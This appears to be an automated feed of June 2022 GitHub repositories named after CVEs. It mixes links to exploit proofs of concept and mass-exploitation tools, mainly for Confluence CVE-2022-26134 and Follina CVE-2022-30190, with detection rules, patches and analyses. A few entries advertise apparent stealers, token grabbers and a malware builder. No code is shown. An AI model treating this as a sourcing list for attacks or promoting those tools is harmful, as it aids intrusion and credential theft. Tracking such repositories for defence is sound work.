**Extract payload URLs from Follina (CVE-2022-30190) docx and rtf files** : [MalwareTech/FollinaExtractor](https://github.com/MalwareTech/FollinaExtractor) create time: 2022-06-15T02:22:53Z

**CVE-2022-22620: Use-after-free in Safari** : [kmeps4/CVE-2022-22620](https://github.com/kmeps4/CVE-2022-22620) create time: 2022-06-14T22:08:14Z

**no description** : [ahaShiyu/CVE-2018-15856](https://github.com/ahaShiyu/CVE-2018-15856) create time: 2022-06-14T19:32:35Z

**no description** : [ahaShiyu/CVE-2018-18839](https://github.com/ahaShiyu/CVE-2018-18839) create time: 2022-06-14T19:21:37Z

**no description** : [ahaShiyu/CVE-2018-19854](https://github.com/ahaShiyu/CVE-2018-19854) create time: 2022-06-14T19:11:55Z

**no description** : [ahaShiyu/CVE-2018-20175](https://github.com/ahaShiyu/CVE-2018-20175) create time: 2022-06-14T19:07:33Z

**no description** : [ahaShiyu/CVE-2019-3560](https://github.com/ahaShiyu/CVE-2019-3560) create time: 2022-06-14T18:47:10Z

**no description** : [ahaShiyu/CVE-2019-12874](https://github.com/ahaShiyu/CVE-2019-12874) create time: 2022-06-14T15:10:15Z

**no description** : [ahaShiyu/CVE-2019-1010319](https://github.com/ahaShiyu/CVE-2019-1010319) create time: 2022-06-14T14:42:12Z

**WebLogic CNVD-C-2019_48814 CVE-2017-10271 Scan By 7kbstorm** : [KKsdall/7kbstormq](https://github.com/KKsdall/7kbstormq) create time: 2022-06-14T12:55:53Z

**writeup and poc for [CVE-2022-26809] CVE-2022-26809 Vulnerabillity in cre windows componen(RPC) with a high cvss score of 9.8** : [scoobydoobi/CVE-2022-26809-POC-RCE](https://github.com/scoobydoobi/CVE-2022-26809-POC-RCE) create time: 2022-06-14T12:53:36Z

**no description** : [ernestak/Sigma-Rule-for-CVE-2022-30190](https://github.com/ernestak/Sigma-Rule-for-CVE-2022-30190) create time: 2022-06-14T09:27:37Z

**I wrote a blog post about Apache CouchDB CVE-2022-24706 RCE Exploits** : [ahmetsabrimert/Apache-CouchDB-CVE-2022-24706-RCE-Exploits-Blog-post-](https://github.com/ahmetsabrimert/Apache-CouchDB-CVE-2022-24706-RCE-Exploits-Blog-post-) create time: 2022-06-14T08:34:11Z

**no description** : [ernestak/CVE-2022-30190](https://github.com/ernestak/CVE-2022-30190) create time: 2022-06-14T08:29:40Z

**no description** : [l00neyhacker/CVE-2021-40650](https://github.com/l00neyhacker/CVE-2021-40650) create time: 2022-06-13T23:43:19Z

**no description** : [l00neyhacker/CVE-2021-40649](https://github.com/l00neyhacker/CVE-2021-40649) create time: 2022-06-13T23:33:20Z

**CVE-2022-26134 - Pre-Auth Remote Code Execution via OGNL Injection** : [Chocapikk/CVE-2022-26134](https://github.com/Chocapikk/CVE-2022-26134) create time: 2022-06-13T23:01:39Z

**Python file scanner created in 2021 scanning for known and potential vulns** : [XxToxicScriptxX/CVE-2022-30190](https://github.com/XxToxicScriptxX/CVE-2022-30190) create time: 2022-06-13T21:32:45Z

**A python based exploit for CVE-2022-30525** : [ProngedFork/CVE-2022-30525](https://github.com/ProngedFork/CVE-2022-30525) create time: 2022-06-13T21:11:54Z

**Haraj Script 3.7 - Post Ads Authenticated Stored XSS** : [bigzooooz/CVE-2022-31301](https://github.com/bigzooooz/CVE-2022-31301) create time: 2022-06-13T19:47:04Z

**Haraj Script 3.7 - DM Section Authenticated Stored XSS** : [bigzooooz/CVE-2022-31300](https://github.com/bigzooooz/CVE-2022-31300) create time: 2022-06-13T19:42:37Z

**Haraj Script 3.7 - Reflected XSS** : [bigzooooz/CVE-2022-31299](https://github.com/bigzooooz/CVE-2022-31299) create time: 2022-06-13T19:32:23Z

**Haraj Script 3.7 - Authenticated Stored XSS** : [bigzooooz/CVE-2022-31298](https://github.com/bigzooooz/CVE-2022-31298) create time: 2022-06-13T19:30:12Z

**Haraj Script 3.7 - Reflected XSS** : [bigzooooz/CVE-2022-31297](https://github.com/bigzooooz/CVE-2022-31297) create time: 2022-06-13T19:25:41Z

**Online Discussion Forum Site 1.0 - Blind SQL Injection** : [bigzooooz/CVE-2022-31296](https://github.com/bigzooooz/CVE-2022-31296) create time: 2022-06-13T19:21:04Z

**no description** : [bigzooooz/CVE-2022-31295](https://github.com/bigzooooz/CVE-2022-31295) create time: 2022-06-13T19:16:13Z

**no description** : [bigzooooz/CVE-2022-31294](https://github.com/bigzooooz/CVE-2022-31294) create time: 2022-06-13T19:03:04Z

**no description** : [randorisec/CVE-2022-1972-infoleak-PoC](https://github.com/randorisec/CVE-2022-1972-infoleak-PoC) create time: 2022-06-10T13:15:20Z

**dvb-2022-MaksimsCvetkovs created by GitHub Classroom** : [MaksimsCvetkovs/2022-DP3-3-MaksimsCvetkovs](https://github.com/MaksimsCvetkovs/2022-DP3-3-MaksimsCvetkovs) create time: 2022-05-15T08:02:39Z

**To determine if an APK is vulnerable to CVE-2017-13156** : [M507/CVE-2017-13156](https://github.com/M507/CVE-2017-13156) create time: 2022-06-10T23:32:29Z

**Safenet Authentication Client Privilege Escalation - CVE-2021-42056** : [z00z00z00/Safenet_SAC_CVE-2021-42056](https://github.com/z00z00z00/Safenet_SAC_CVE-2021-42056) create time: 2021-11-18T14:27:06Z

**Missing Authentication on Critical component CVE-2021-38540** : [Captain-v-hook/PoC-for-CVE-2021-38540-](https://github.com/Captain-v-hook/PoC-for-CVE-2021-38540-) create time: 2022-06-13T11:43:26Z

**4.9 Kernel Exploit for CVE-2020-27786** : [kiks7/CVE-2020-27786-Kernel-Exploit](https://github.com/kiks7/CVE-2020-27786-Kernel-Exploit) create time: 2022-06-13T08:04:19Z

**An Unofficial Patch Follina CVE-2022-30190 (patch) by micrisoft Guidelines. for more details goto : https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/** : [SonicWave21/Follina-CVE-2022-30190-Unofficial-patch-](https://github.com/SonicWave21/Follina-CVE-2022-30190-Unofficial-patch-) create time: 2022-06-13T04:20:02Z

**no description** : [trhacknon/CVE-2021-3156](https://github.com/trhacknon/CVE-2021-3156) create time: 2022-06-13T02:40:36Z

**CVE-2022-26134 - Confluence Pre-Auth Remote Code Execution via OGNL Injection** : [Chocapikk/CVE-2022-26134](https://github.com/Chocapikk/CVE-2022-26134) create time: 2022-06-12T22:40:15Z

**I'm trying** : [1SeaMy/CVE-2022-22954](https://github.com/1SeaMy/CVE-2022-22954) create time: 2022-06-12T21:41:38Z

**no description** : [trhacknon/CVE-2022-26134-bis](https://github.com/trhacknon/CVE-2022-26134-bis) create time: 2022-06-12T21:26:17Z

**no description** : [trhacknon/CVE-2022-26134](https://github.com/trhacknon/CVE-2022-26134) create time: 2022-06-12T20:24:36Z

**no description** : [ahmetfurkans/CVE-2022-22718](https://github.com/ahmetfurkans/CVE-2022-22718) create time: 2022-06-12T20:18:00Z

**no description** : [seymanurmutlu/CVE-2022-24086-CVE-2022-24087](https://github.com/seymanurmutlu/CVE-2022-24086-CVE-2022-24087) create time: 2022-06-12T19:54:16Z

**CVE 2022-21449** : [fundaergn/CVE-2022-21449](https://github.com/fundaergn/CVE-2022-21449) create time: 2022-06-12T19:41:48Z

**A OS Command Injection Vulnerability in the CGI Program of Zyxel** : [furkanzengin/CVE-2022-30525](https://github.com/furkanzengin/CVE-2022-30525) create time: 2022-06-12T19:04:41Z

**Python3 code to CVE-2019-15107 and CVE-2019-15231** : [NullBrunk/WebminExploit](https://github.com/NullBrunk/WebminExploit) create time: 2022-06-12T15:31:38Z

**Practicing technical writing with researching CVE-2022-22954 VMware Workspace ONE Access RCE vulnerability.** : [arzuozkan/CVE-2022-22954](https://github.com/arzuozkan/CVE-2022-22954) create time: 2022-06-11T14:39:57Z

**no description** : [mel1huc4r/CVE-2022-31983](https://github.com/mel1huc4r/CVE-2022-31983) create time: 2022-06-12T14:59:01Z

**no description** : [heavenswill/CVE-2022-32013](https://github.com/heavenswill/CVE-2022-32013) create time: 2022-06-12T13:15:58Z

**Log4Shell CVE-2021-44228 Demo** : [ra890927/Log4Shell-CVE-2121-44228-Demo](https://github.com/ra890927/Log4Shell-CVE-2121-44228-Demo) create time: 2022-06-12T10:57:07Z

**Axios Redos (CVE-2021-3749) proof of concept** : [T-Guerrero/axios-redos](https://github.com/T-Guerrero/axios-redos) create time: 2022-06-12T03:06:45Z

**CVE-2022-24806 and CVE-2022-24807 are an unauthenticated RCE vulnerability in magento and adobe commerce** : [oturu/CVE-2022-24806-MASS-RCE](https://github.com/oturu/CVE-2022-24806-MASS-RCE) create time: 2022-06-11T18:59:00Z

**CVE-2021-35576** : [emad-almousa/CVE-2021-35576](https://github.com/emad-almousa/CVE-2021-35576) create time: 2022-06-11T17:36:01Z

**proof of concept to CVE-2022-30190 (follina)** : [AmitNiz/follina_cve_2022-30190](https://github.com/AmitNiz/follina_cve_2022-30190) create time: 2022-06-10T14:57:17Z

**writeup and poc for [CVE-2022-26809]** : [scoobydoobi/CVE-2022-26809-RCE](https://github.com/scoobydoobi/CVE-2022-26809-RCE) create time: 2022-06-11T13:22:45Z

**CVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina** : [safakTamsesCS/PicusSecurity4.Week.Repo](https://github.com/safakTamsesCS/PicusSecurity4.Week.Repo) create time: 2022-06-10T12:09:37Z

**Exploit for CVE-2017-12561: dbman Opcode 10012 Use-After-Free Remote Code Execution** : [whokilleddb/CVE-2017-12561-Exploit](https://github.com/whokilleddb/CVE-2017-12561-Exploit) create time: 2022-06-11T11:00:42Z

**no description** : [trhacknon/CVE-2022-30075](https://github.com/trhacknon/CVE-2022-30075) create time: 2022-06-11T07:04:55Z

**[CVE-2022-26134] Attlasian Confluence RCE** : [KeepWannabe/BotCon](https://github.com/KeepWannabe/BotCon) create time: 2022-06-10T18:07:16Z

**this is my simple article about CVE 2022-30190 (Follina) analysis. I use the lab from Letsdefend.** : [Abdibimantara/CVE-2022-30190-Analysis-With-LetsDefends-Lab](https://github.com/Abdibimantara/CVE-2022-30190-Analysis-With-LetsDefends-Lab) create time: 2022-06-10T16:29:07Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20004](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20004) create time: 2022-06-10T12:23:08Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20005](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20005) create time: 2022-06-10T11:56:59Z

**no description** : [google-mirror/CVE-2022-1966](https://github.com/google-mirror/CVE-2022-1966) create time: 2022-06-10T11:34:25Z

**NEW EXPLOIT FOR TP LINK** : [SAJIDAMINE/CVE-2022-30075](https://github.com/SAJIDAMINE/CVE-2022-30075) create time: 2022-06-10T11:09:30Z

**[CVE-2022-26134] Confluence Pre-Auth Object-Graph Navigation Language (OGNL) Injection** : [murataydemir/CVE-2022-26134](https://github.com/murataydemir/CVE-2022-26134) create time: 2022-06-10T09:52:22Z

**no description** : [warmachine-57/CVE-2021-44582](https://github.com/warmachine-57/CVE-2021-44582) create time: 2022-06-10T08:32:28Z

**CVE-2022-26134, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This is CVE-2022-26134 expoitation script** : [sunny-kathuria/exploit_CVE-2022-26134](https://github.com/sunny-kathuria/exploit_CVE-2022-26134) create time: 2022-06-10T08:57:30Z

**PoC for Sourcegraph Gitserver < 3.37.0 RCE** : [Altelus1/CVE-2022-23642](https://github.com/Altelus1/CVE-2022-23642) create time: 2022-06-10T06:12:15Z

**CVE-2018-17240** : [BBge/CVE-2018-17240](https://github.com/BBge/CVE-2018-17240) create time: 2022-06-10T04:34:17Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20007](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20007) create time: 2022-06-10T04:26:02Z

**hello** : [buff07/CVE-2022-31403](https://github.com/buff07/CVE-2022-31403) create time: 2022-06-10T03:25:56Z

**CVE-2022-31402** : [YavuzSahbaz/CVE-2022-31402](https://github.com/YavuzSahbaz/CVE-2022-31402) create time: 2022-06-10T03:23:58Z

**check CVE-2021-40438** : [gassara-kys/CVE-2021-40438](https://github.com/gassara-kys/CVE-2021-40438) create time: 2022-06-10T00:46:58Z

**Mitigation for CVE-2022-30190** : [k508/CVE-2022-30190](https://github.com/k508/CVE-2022-30190) create time: 2022-06-10T00:23:11Z

**no description** : [34dsfsdf4/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft](https://github.com/34dsfsdf4/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft) create time: 2022-06-09T21:38:51Z

**no description** : [34dsfsdf4/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/34dsfsdf4/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2022-06-09T21:31:49Z

**no description** : [34dsfsdf4/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/34dsfsdf4/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2022-06-09T21:30:54Z

**no description** : [Trhackno/CVE-2022-23808](https://github.com/Trhackno/CVE-2022-23808) create time: 2022-06-09T17:34:46Z

**Python exploit for CVE-2011-2523 (VSFTPD 2.3.4 Backdoor Command Execution)** : [0xSojalSec/-CVE-2011-2523](https://github.com/0xSojalSec/-CVE-2011-2523) create time: 2022-06-09T16:25:25Z

**Bash poc for CVE-2022-1609 WordPress Weblizar Backdoor** : [0xSojalSec/-CVE-2022-1609](https://github.com/0xSojalSec/-CVE-2022-1609) create time: 2022-06-09T14:36:55Z

**no description** : [SamuelGaudemer/POC_CVE-2020-11898](https://github.com/SamuelGaudemer/POC_CVE-2020-11898) create time: 2022-06-09T13:42:01Z

**Information and Scripts to remediate and restore functionality for CVE 2022 30190** : [ToddMaxey/CVE-2022-30190](https://github.com/ToddMaxey/CVE-2022-30190) create time: 2022-06-09T13:19:23Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20007](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20007) create time: 2022-06-09T11:13:18Z

**Repository containing the compromised certificate seen in recent CVE-2022-30190 (Follina) attacks.** : [b401/Clickstudio-compromised-certificate](https://github.com/b401/Clickstudio-compromised-certificate) create time: 2022-06-09T10:03:06Z

**Exploit Microsoft Zero-Day Vulnerability Follina (CVE-2022-30190)** : [Hrishikesh7665/Follina_Exploiter_CLI](https://github.com/Hrishikesh7665/Follina_Exploiter_CLI) create time: 2022-06-09T09:32:10Z

**CVE-2022-26134** : [cai-niao98/CVE-2022-26134](https://github.com/cai-niao98/CVE-2022-26134) create time: 2022-06-09T02:11:58Z

**Exploit modificado para el tito Eu** : [CronoX1/CVE-2021-4034](https://github.com/CronoX1/CVE-2021-4034) create time: 2022-06-08T20:00:39Z

**writeup and poc for cve-2022-26809** : [scoobydoobi/CVE-2022-26809-RCE-POC](https://github.com/scoobydoobi/CVE-2022-26809-RCE-POC) create time: 2022-06-08T17:22:21Z

**# CVE-2019-1205 Silent Exploit ![a28tEav](https://i.imgur.com/6DaHqte.jpg) ![a28tEav](https://imgur.com/X6Lu9Ja.jpg) ![a28tEav](https://imgur.com/Csvk1ym.jpg) 2022 Silent DOC Exploit CVE 2019-1205 YouTube Tutorial : https://youtu.be/eWhwFEyWnak These videos were not taken for illegal activities. Do not use the product for illegal activities! When using this product it serves to encrypt and protect your files. In this way, access to the source code cannot be provided. It can never be abused! It is a software used to encrypt your files safely. It cannot be used maliciously! Otherwise, we do not accept full responsibility for this. It is not an illegal Crypter service. All the software tested belongs to us I never test with remote administration tools and certainly do not recommend such a thing to people as the producer of the program. It is a software produced to protect the data of your own clean project from malicious people. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-1205 # Tags silent exploit, silent exploit pdf, silent exploit doc, silent exploit jpg, silent exploit builder, silent exploit android jpg, silent exploit builder cracked, the silent comedy exploitation, silent pdf exploit builder python, fresh silent doc exploit, daily exploits silent aim, silent aim hack, silent aim cheat, silent aim hack bgmi, hack silent aim blox fruit, silent hack bgmi, silent hack bgmi 1.8, silent hack cartoon, silent castle cheat, silent castle hack, silent cartographer glitch, silent doc exploit, silent exploit electra, silent exploit error, silent exploit electra 11.3.1, silent exploit explained, silent exploit ep 1, silent exploit free, silent exploit free download, silent exploit failed, silent exploit for roblox, silent exploit fortnite, silent exploit fallout 76, silent hack game, silent glitch hunter call of the wild, silent hill hack, cheat silent hill origins ppsspp, silent hill glitch, silent exploit in a sentence, silent exploit in guards, silent exploit in spanish, silent exploit in roblox, silent exploit in ragdoll engine, silent jpg exploit, silent exploit kit, silent exploit kit detection, silent exploit krunk, silent lighter hack, silent microwave hack, silent exploit netcore router backdoor access, silent exploit no more, silent exploit no virus, silent exploit news, silent exploit nyc, silent exploit on roblox, silent exploit oil painting was, silent exploit on mobile, silent exploit on mac, silent hack pubg, silent hack pubg 1.8, silent cheat pubg, silent hack pubg mobile, silent pdf exploit, silent exploit quest, silent exploit quest 2, silent hack real, hack silent samp, silent treatment hack, silent exploit used in a sentence, silent exploit update, silent exploit unboxing, silent exploit usa, silent hack video, silent exploit website, silent exploit workers, silent exploit weakness, silent exploit warframe, silent exploit warzone, silent exploit windows 10, silent exploit web development, silent exploit xbox, silent hack youtubers, silent exploit zombs royale, silent exploit zombies, silent exploit 07, silent exploit 03, silent exploit 01, silent exploit 11.3.1, silent exploit 10 hours, silent exploit 101, silent exploit 2018, silent exploit 2021, silent exploit 2020, silent exploit 3ds, silent exploit 3ds fbi, silent exploit 3ds 11.7, silent exploit 30, silent exploit 360, silent exploit 4k, silent exploit 5.55, silent exploit 5.55 download, silent exploit 50, silent exploit 666, silent exploit 8d, silent exploit 8k, silent exploit 90s** : [razordeveloper/Silent-DOC-Exploit](https://github.com/razordeveloper/Silent-DOC-Exploit) create time: 2022-06-08T16:31:36Z

**no description** : [emrekara369/cve-2019-12461](https://github.com/emrekara369/cve-2019-12461) create time: 2022-06-08T16:20:44Z

**no description** : [emrekara369/cve-2019-1246](https://github.com/emrekara369/cve-2019-1246) create time: 2022-06-08T16:20:34Z

**no description** : [alpernae/CVE-2022-28132](https://github.com/alpernae/CVE-2022-28132) create time: 2022-06-08T16:19:47Z

**Microsoft vulnerability for CVE 2019-1205 in 2022.** : [razordeveloper/CVE-2019-1205](https://github.com/razordeveloper/CVE-2019-1205) create time: 2022-06-08T15:51:36Z

**no description** : [sentrium-security/Follina-Workaround-CVE-2022-30190](https://github.com/sentrium-security/Follina-Workaround-CVE-2022-30190) create time: 2022-06-08T14:20:50Z

**no description** : [Trhackno/CVE-2022-1609](https://github.com/Trhackno/CVE-2022-1609) create time: 2022-06-08T11:28:08Z

**Proof of Concept of CVE-2022-30190** : [Malwareman007/Deathnote](https://github.com/Malwareman007/Deathnote) create time: 2022-06-08T10:58:23Z

**Spring Cloud Gateway 远程代码执行漏洞 Spring_Cloud_Gateway_RCE_POC-CVE-2022-22947** : [YDH777/CVE-2022-22947-POC](https://github.com/YDH777/CVE-2022-22947-POC) create time: 2022-06-08T09:52:23Z

**Atlassian confluence unauthenticated ONGL injection remote code execution scanner (CVE-2022-26134).** : [redhuntlabs/ConfluentPwn](https://github.com/redhuntlabs/ConfluentPwn) create time: 2022-06-08T04:53:31Z

**no description** : [motherfucker12138/CVE-2020-0796_SMBGhost](https://github.com/motherfucker12138/CVE-2020-0796_SMBGhost) create time: 2022-06-08T07:52:26Z

**no description** : [hou5/CVE-2022-26134](https://github.com/hou5/CVE-2022-26134) create time: 2022-06-08T07:54:56Z

**Exploit vulnerabilities and vulnerability prevention implementation** : [TrG-1999/DetectPacket-CVE-2017-8464](https://github.com/TrG-1999/DetectPacket-CVE-2017-8464) create time: 2022-06-08T01:39:48Z

**Proof of concept of the Log4Shell vulnerability (CVE-2021-44228)** : [jaehnri/CVE-2021-44228](https://github.com/jaehnri/CVE-2021-44228) create time: 2022-06-08T01:09:28Z

**This project files demostrate a proof-of-concept of log4j vulnerability (CVE-2021-44228) on AWS using Terraform Infrastructure-as-a-code means.** : [moshuum/tf-log4j-aws-poc](https://github.com/moshuum/tf-log4j-aws-poc) create time: 2022-06-07T13:30:37Z

**PoC exploit for Tp-Link AX50 (CVE-2022-30075)** : [aaronsvk/CVE-2022-30075](https://github.com/aaronsvk/CVE-2022-30075) create time: 2022-06-07T23:26:47Z

**Server to host/activate Follina payloads & generator of malicious Word documents exploiting the MS-MSDT protocol. (CVE-2022-30190)** : [dsibilio/follina-spring](https://github.com/dsibilio/follina-spring) create time: 2022-06-07T22:46:23Z

**no description** : [PyterSmithDarkGhost/0DAYEXPLOITAtlassianConfluenceCVE-2022-26134](https://github.com/PyterSmithDarkGhost/0DAYEXPLOITAtlassianConfluenceCVE-2022-26134) create time: 2022-06-07T19:59:55Z

**CVE-2020-0796 explanation and researching vulnerability for term porject CENG325** : [arzuozkan/CVE-2020-0796](https://github.com/arzuozkan/CVE-2020-0796) create time: 2022-06-07T17:16:16Z

**Notes related to CVE-2022-30190** : [abhirules27/Follina](https://github.com/abhirules27/Follina) create time: 2022-06-07T17:11:57Z

**no description** : [Y000o/Confluence-CVE-2022-26134](https://github.com/Y000o/Confluence-CVE-2022-26134) create time: 2022-06-07T16:42:36Z

**Simple Honeypot for Atlassian Confluence (CVE-2022-26134)** : [SIFalcon/confluencePot](https://github.com/SIFalcon/confluencePot) create time: 2022-06-06T15:44:24Z

**CVE-2021-41773 | Apache HTTP Server 2.4.49 is vulnerable to Path Traversal and Remote Code execution attacks** : [hab1b0x/CVE-2021-41773](https://github.com/hab1b0x/CVE-2021-41773) create time: 2022-06-07T11:22:08Z

**Atlassian Confluence- Unauthenticated OGNL injection vulnerability (RCE)** : [hab1b0x/CVE-2022-26134](https://github.com/hab1b0x/CVE-2022-26134) create time: 2022-06-07T11:55:37Z

**Apache 2.4.49 RCE CVE-2021-41773 in Ruby** : [hab1b0x/CVE-2021-41773](https://github.com/hab1b0x/CVE-2021-41773) create time: 2022-06-07T10:38:23Z

**Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection** : [whokilleddb/CVE-2022-26134-Confluence-RCE](https://github.com/whokilleddb/CVE-2022-26134-Confluence-RCE) create time: 2022-06-07T11:17:25Z

**CVE-2022-26134 Confluence OGNL Injection POC** : [alcaparra/CVE-2022-26134](https://github.com/alcaparra/CVE-2022-26134) create time: 2022-06-07T10:36:11Z

**Microsoft Support Diagnostic Tool (CVE-2022-30190)** : [joshuavanderpoll/CVE-2022-30190](https://github.com/joshuavanderpoll/CVE-2022-30190) create time: 2022-06-07T10:07:52Z

**CVE-2022-23222: Linux Kernel eBPF Local Privilege Escalation** : [tr3ee/CVE-2022-23222](https://github.com/tr3ee/CVE-2022-23222) create time: 2022-06-07T03:20:23Z

**no description** : [BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL](https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL) create time: 2022-06-07T09:19:02Z

**Implementation of CVE-2022-26134** : [reubensammut/cve-2022-26134](https://github.com/reubensammut/cve-2022-26134) create time: 2022-06-07T08:58:07Z

**Atlassian Confluence 远程代码执行漏洞(CVE-2022-26134)** : [li8u99/CVE-2022-26134](https://github.com/li8u99/CVE-2022-26134) create time: 2022-06-07T06:57:02Z

**C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode in…** : [1342486672/Flangvik](https://github.com/1342486672/Flangvik) create time: 2022-06-07T02:09:10Z

**no description** : [vesperp/CVE-2022-26134-Confluence](https://github.com/vesperp/CVE-2022-26134-Confluence) create time: 2022-06-07T02:16:56Z

**no description** : [PsykoDev/CVE-2022-26134](https://github.com/PsykoDev/CVE-2022-26134) create time: 2022-06-06T16:45:35Z

**Désactivation du protocole MSDT URL (CVE-2022-30190) avec gestion des erreurs et de l'exit code pour un déploiement en masse** : [Rojacur/FollinaPatcherCLI](https://github.com/Rojacur/FollinaPatcherCLI) create time: 2022-06-06T16:25:41Z

**CVE-2022-0847 used to achieve container escape** : [greenhandatsjtu/CVE-2022-0847](https://github.com/greenhandatsjtu/CVE-2022-0847) create time: 2022-06-04T08:31:32Z

**no description** : [Satheesh575555/system_bt_AOSP10_r33_CVE-2021-0589](https://github.com/Satheesh575555/system_bt_AOSP10_r33_CVE-2021-0589) create time: 2022-06-06T12:13:41Z

**Exploit in Rails Development Mode. With some knowledge of a target application it is possible for an attacker to guess the automatically generated development mode secret token. This secret token can be used in combination with other Rails internals to escalate to a remote code execution exploit.** : [PenTestical/CVE-2019-5420](https://github.com/PenTestical/CVE-2019-5420) create time: 2022-06-06T10:01:35Z

**Microsoft MS-MSDT Follina (0-day Vulnerability) CVE-2022-30190 Attack Vector** : [IamVSM/msdt-follina](https://github.com/IamVSM/msdt-follina) create time: 2022-06-06T09:17:25Z

**This repository talks about Zero-Day Exploitation of Atlassian Confluence, it's defense and analysis point of view from a SecOps or Blue Team perspective** : [archanchoudhury/Confluence-CVE-2022-26134](https://github.com/archanchoudhury/Confluence-CVE-2022-26134) create time: 2022-06-06T06:16:47Z

**TCP, when using a large Window Size, makes it easier for remote attackers to guess sequence numbers and cause a denial of service (connection loss) to persistent TCP connections by repeatedly injecting a TCP RST packet.** : [RakeshShinde97/CVE-2004-0230-TCP-Sequence-Number-Approximation-Based-Denial-of-Service](https://github.com/RakeshShinde97/CVE-2004-0230-TCP-Sequence-Number-Approximation-Based-Denial-of-Service) create time: 2022-06-06T04:30:03Z

**Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)** : [h3v0x/CVE-2022-26134](https://github.com/h3v0x/CVE-2022-26134) create time: 2022-06-06T02:43:06Z

**no description** : [Trhackno/CVE-2021-35064](https://github.com/Trhackno/CVE-2021-35064) create time: 2022-06-06T00:14:54Z

**Proof of Concept/Test for CVE-2022-24713 on Ubuntu** : [ItzSwirlz/CVE-2022-24713-POC](https://github.com/ItzSwirlz/CVE-2022-24713-POC) create time: 2022-06-05T22:17:00Z

**Challenge for you all to prove that CVE-2022–29622 is not false** : [keymandll/CVE-2022-29622](https://github.com/keymandll/CVE-2022-29622) create time: 2022-06-05T22:15:21Z

**no description** : [abhishekmorla/CVE-2022-26134](https://github.com/abhishekmorla/CVE-2022-26134) create time: 2022-06-05T20:35:38Z

**no description** : [0xAgun/CVE-2022-26134](https://github.com/0xAgun/CVE-2022-26134) create time: 2022-06-05T18:23:20Z

**no description** : [rodnt/CVE_2022_26134-detect](https://github.com/rodnt/CVE_2022_26134-detect) create time: 2022-06-05T17:44:20Z

**no description** : [diurs/CVE-2020-24186-wordpress-wpDiscuz](https://github.com/diurs/CVE-2020-24186-wordpress-wpDiscuz) create time: 2022-06-05T17:08:55Z

**no description** : [ItsNee/Folina-CVE-2022-30190-POC](https://github.com/ItsNee/Folina-CVE-2022-30190-POC) create time: 2022-06-05T13:54:04Z

**CVE-2022-26134** : [1rm/Confluence-CVE-2022-26134](https://github.com/1rm/Confluence-CVE-2022-26134) create time: 2022-06-05T13:51:39Z

**Atlassian confluence poc** : [axingde/CVE-2022-26134](https://github.com/axingde/CVE-2022-26134) create time: 2022-06-05T13:41:25Z

**no description** : [Vulnmachines/Confluence-CVE-2022-26134](https://github.com/Vulnmachines/Confluence-CVE-2022-26134) create time: 2022-06-05T12:23:34Z

**no description** : [tej7gandhi/CVE-2022-30190-Zero-Click-Zero-Day-in-msdt](https://github.com/tej7gandhi/CVE-2022-30190-Zero-Click-Zero-Day-in-msdt) create time: 2022-06-05T08:52:11Z

**cve2022-26134** : [0x14dli/cve2022-26134exp](https://github.com/0x14dli/cve2022-26134exp) create time: 2022-06-05T03:11:50Z

**Wordpress Plugin WP User Frontend < 3.5.26 - SQL-Injection (Authenticated)** : [0xAbbarhSF/CVE-2021-25076](https://github.com/0xAbbarhSF/CVE-2021-25076) create time: 2022-06-04T21:22:10Z

**A file upload restriction bypass vulnerability in Pluck CMS before 4.7.13 allows an admin privileged user to gain access in the host through the "manage files" functionality, which may result in remote code execution.** : [0xAbbarhSF/CVE-2020-29607](https://github.com/0xAbbarhSF/CVE-2020-29607) create time: 2022-06-04T21:09:38Z

**Dump SQL database version on host running Casdoor < 1.13.1** : [0xAbbarhSF/CVE-2022-24124](https://github.com/0xAbbarhSF/CVE-2022-24124) create time: 2022-06-04T21:01:22Z

**no description** : [DerZiad/CVE-2022-30190](https://github.com/DerZiad/CVE-2022-30190) create time: 2022-06-04T19:48:37Z

**CVE-2022-29464 PoC for WSO2 products** : [jimidk/Better-CVE-2022-29464](https://github.com/jimidk/Better-CVE-2022-29464) create time: 2022-06-04T16:46:52Z

**PoC of CVE-2022-22978 vulnerability in Spring Security framework** : [ducluongtran9121/CVE-2022-22978-PoC](https://github.com/ducluongtran9121/CVE-2022-22978-PoC) create time: 2022-06-04T16:57:18Z

**Remote Access Shell for Windows (based on cve-2021-30190)** : [CyberTitus/Follina](https://github.com/CyberTitus/Follina) create time: 2022-06-04T14:18:38Z

**【懒人神器】一款图形化、批量采集url、批量对采集的url进行各种nday检测的工具。可用于src挖掘、cnvd挖掘、0day利用、打造自己的武器库等场景。可以批量利用Actively Exploited Atlassian Confluence 0Day CVE-2022-26134。** : [W01fh4cker/Serein](https://github.com/W01fh4cker/Serein) create time: 2022-05-31T07:44:01Z

**no description** : [Sakura-nee/CVE-2022-26134](https://github.com/Sakura-nee/CVE-2022-26134) create time: 2022-06-04T13:02:10Z

